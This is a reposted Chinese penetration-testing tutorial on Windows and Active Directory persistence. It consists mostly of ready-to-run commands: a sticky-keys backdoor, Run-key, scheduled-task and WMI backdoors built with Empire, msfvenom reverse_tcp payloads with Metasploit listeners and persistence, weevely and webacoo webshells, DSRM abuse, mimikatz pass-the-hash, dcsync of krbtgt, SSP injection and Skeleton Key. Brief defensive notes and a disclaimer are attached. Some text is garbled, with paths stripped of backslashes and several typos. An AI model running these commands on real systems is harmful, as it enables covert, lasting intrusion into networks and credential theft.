扫码领资料
获网安教程
分享者才是学习中最大的受益者!
文章来源: https://forum.butian.net/share/524文章作者:略略略如有侵权请您联系我们,我们会进行删除并致歉
前言
Empire
前言
主要实现对内网中提权、横向移动、权限维持
笔者发现这个工具权限维持很香
安装
git clone https://github.com/EmpireProject/Empire.git
sudo ./Empire/setup/install.sh
sudo ./setup/reset.sh
sudo ./Empire/empire
docker pull empireproject/empire
docker run -it -p 7000:7000 --name empire empireproject/empire /bin/bash
sudo ./setup/reset.sh
sudo ./empire
pip install pefile
操作系统后门
粘滞键后门
手上
-
工作组的命令框
-
域用户的命令框
sethc.exe.bak替换windowssystdm32目录下的sethc.execd windowssystem32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe
#连续按5次shift键,将弹出命令行窗口。可以直接以system权限执行系统命令
Empire
usemodule lateral_movement/invoke_wmi_debugger
info
set Listener dayu
set ComputerName user1.xiyou.dayu.com (计算机名)
set TargetBinary sethc.exe
execute
最后,在目标系统上连续按5次shift键触发后门:
粘滞键后门防范措施
2.拒绝使用setch.exe或者在“控制面板”中关闭“启用粘滞键”选项
注册表后门
手上
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
Empire
usemodule persistence/userland/registry命令模块usemodule persistence/userland/registry
set Listener dayu
set RegPath HKCU:SoftwareMicrosoftWindowsCurrentVersionRun
execute
注册表后门防范措施
计划任务后门
手上
schtasks命令调用。管理员权限和普通用户权限两种。管理员权限的后门 可以设置更多的计划任务,例如重启后运行等。计划任务后门的基本命令如下。该命令表示每小时执行一次notepad.exe
schtasks /Create /tn Updater /tr notepad.exe /sc MINUTE /mo 1
schtasks /Delete /tn Updater
MSF
use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.253.9
set lport 443
set URIPATH /
exploit
Empire
usemodule persistence/elevated/schtasks
set DailyTime 15:36
set Listener dayu
execute
计划任务后门防范措施
-
安装安全防护软件并对系统进行扫描 -
及时为系统打补丁 -
在内网中使用强度较高的密码
MSF后门
-
生成exe的马儿
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.9 LPORT=4444 -f exe>1.exe
-
开启监听
msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_ tcp; set lhost 192.168.253.27; set lport 4444; exploit -j;"
-
执行后门上线 -
查看帮助
run persistence -h
-
创建服务
run persistence -S -U -X -i 5 -p 443 -r IP
wmi型后门
searchmodule wmi
usemodule persistence/elevated/wmi
info
set DailyTime 16:10
set Listener dayu
run
检测后门
Get-WmiObject -Namespace rootSubscription -Class CommandLineEventConsumer -FILTER "Name='Updater'"
这样就是没有的
清除WMI后门得到方法
在powershell中用
get-wmiobject命令删除与WMI持久化的组件web后门
weevely后门
功能
1.执行命令和测览远程文件
2.检测常见的服务器配置问题
3.创建 TCP Shell 和 Reverse Shell
4.打扫描端口
5.安装HTTP代理
使用
weevely session <path> cmd #加载会话文件
weevely generate <password> <path> # 生成后门代理,一般用这个
webacco后门
-
安装
apt install webacoo
-
生成shell
webacoo -g -o 123.php
-
连接后门
域控制器权限持久化
DSRM域后门
在渗透测试中,可以使用DSRM账号对域环境进行持久化操作。
-
如果域控制器的系统版本为Windows Server 2008,需要安装 KB961320才可以使用指定域账号的密码对DSRM的密码进行同步。 -
在 Windows Server 2008以后版本的系统中不需要安装此补丁。 -
如果域控制器的系统版本为Windows Server 2003则不能使用该方法进行持久化操作
修改DSRM密码
第一种
1. NTDSUTIL: 登录ntdsutil
2. set dsrm password #设置DSRM密码
3. reset password on server null #在当前域控服务器上恢复DSRM密码
4. <PASSWORD> # 修改后的密码
5. q # 退出密码设置模式
6. q # 退出NTDSUTIL模式
第二种
ntdsutil
set dsrm password
sync from domain account krbtgt
q
q
lsadump::sam
lsadump::lsa /patch /name:krbtgt
DSRM的三种登录方式
-
0:默认值,只有当城控制器重启并进入DSRM模式时,才可以使用DSRM管理员账号。 -
1:只有当本地AD、DS服务停止时,才可以使用DSRM管理员账号登录域控制器。 -
2:在任何情况下,都可以使用DSRM管理员账号登录域控制器。
New-ItemProperty "hklm:systemcurrentcontrolsetcontrollsa" -name "dsrmadminlog
onbehavior" -value 2 -propertyType DWORD
使用DSRM账号通过网络远程登录域控制器
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:xxx /ntlm:xxx
使用Mimikatz的scysnc功能远程转储krbtgt的NTML Hash
lsadump::dcsync /domain:xiyou.dayu.com /dc:dc /user:krbtgt
DSRM域后门防御措施
-
定期检查注册表中用于控制DSRM登录方式的键值 hklm:systemcurrentcontrolsetcontrollsa确认该键值为1,或者删除该键值 -
定期修改城中所有城控制器的DSRM账号。 -
经常检查ID为4794的日志。当试设置活动目录服务还原模式的管理员密码会被记录在4794日志中。
SSP维持域控权限
利用mimikatz 注入
privilege::debug
misc::memssp
C:WindowsSystem32mimilsa.log 中利用mimikatz下的mimicom.idl文件(现在被查杀)
并将 mimilib添加到注册表中就可以了修改
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Lsa/Security Packages项,加载新的DLL文件!reg query hklmsystemcurrentcontrolsetcontrollsa /v "Security Packages"
reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberos0msv1_00schannel0wdigest0tspkg0pku2u0mimilib" /t REG_MULTI_SZ
C:windowssystem32kiwissp.log 中防御措施
1.检查 HKEY LOCAL MCNSSrCnContooCotroro sScrt Packages 项中是否含有可疑的 DLL 文件。
2.检查C:WindowsSystem32目录下是否有可疑的DLL文件。
3.使用第三方工具检查LSA中是否有可疑的DLL文件。
SID History后门
黄金票据
原理
特点
不需要与AS进行交互
需要krbtgt用户的NTLM hash
条件
1.域名称
2.域的SID值
3.域的KRBTGT账户的NTLM-Hash
4.伪造任意用户名
白银票据
原理
特点
1.不需要与KDC进行交互
2.需要server的NTLM hash
金票和银票的区别
服务列表
白银票据默认组
SID History后门优势
SID History域后门的防御措施
1.可以通过注入SID History属性完成持久化任务。
2.拥有高权限SID的用户,可以使用PowerShell远程导出域控制器的ntds.dit。
3.如果不再需要通过SID History属性实现持久化,可以使用sid::clear /sam:username清除SID Hi story的属性。
SID History后门防范措施
-
经常查看域用户中SID为500的用户。 -
完成域迁移工作后,对有相同SID History属性的用户进定期3.定期检查ID为4765和4766的日志。4765 为将SID Histtory属性添加到用户的日志。4766为将SID History属性添加到用户失败的日志。
Skeleton Key
手工
privilege::debug
misc::skeleton
net use \xiyou.xiyou.dayu.comipc$ "mimikatz" /user:xiyou.dayu.comadministrator
Empire
interact KFSV7YB1 # 进入agent
usemodule persistence/misc/skeleton_key
execute
Skeleton Key防范措施
通用的Skeleton Key的防御措施列举如下:
1.域管理员用户要设置强口令,确保恶意代码不会在城控制器中执行。
2.在所有城用户中启用双因子认证,例如智能卡认证。
3.启动(例如应用程序白名单例如AppLocker以限制mimikatz在域控制器中的运行。
4.在日常网络维护中注意以下方面,也可以有效防范Skeleton Key
5.只能在64位操作系统中使用,包括WinwnSren2012、Winds Sener 2012、Windows Sever 200 Wind ows Sever 2008 R2、 WindowServer 2003 R2、 Windows Server 2003。
6.只有具有城管理员权限的用户可以将SleloKe。注人城控制器的lass cxe进程。
7.Seleton Key被注人后,用户使用现有的密码仍然可以登录系统。
8.因为Seleton Key是被注入lsass.exeex e进程的,所以它只存在于内存中。如果域控制器重启,注人的Skeleton Key将会失效
总结
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
如果你是一个网络安全爱好者,欢迎加入我的知识星球:zk安全知识星球,我们一起进步一起学习。星球不定期会分享一些前言漏洞,每周安全面试经验、SRC实战纪实等文章分享,微信识别二维码,只需25,即可加入,如不满意,72 小时内可在 App 内无条件自助退款。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论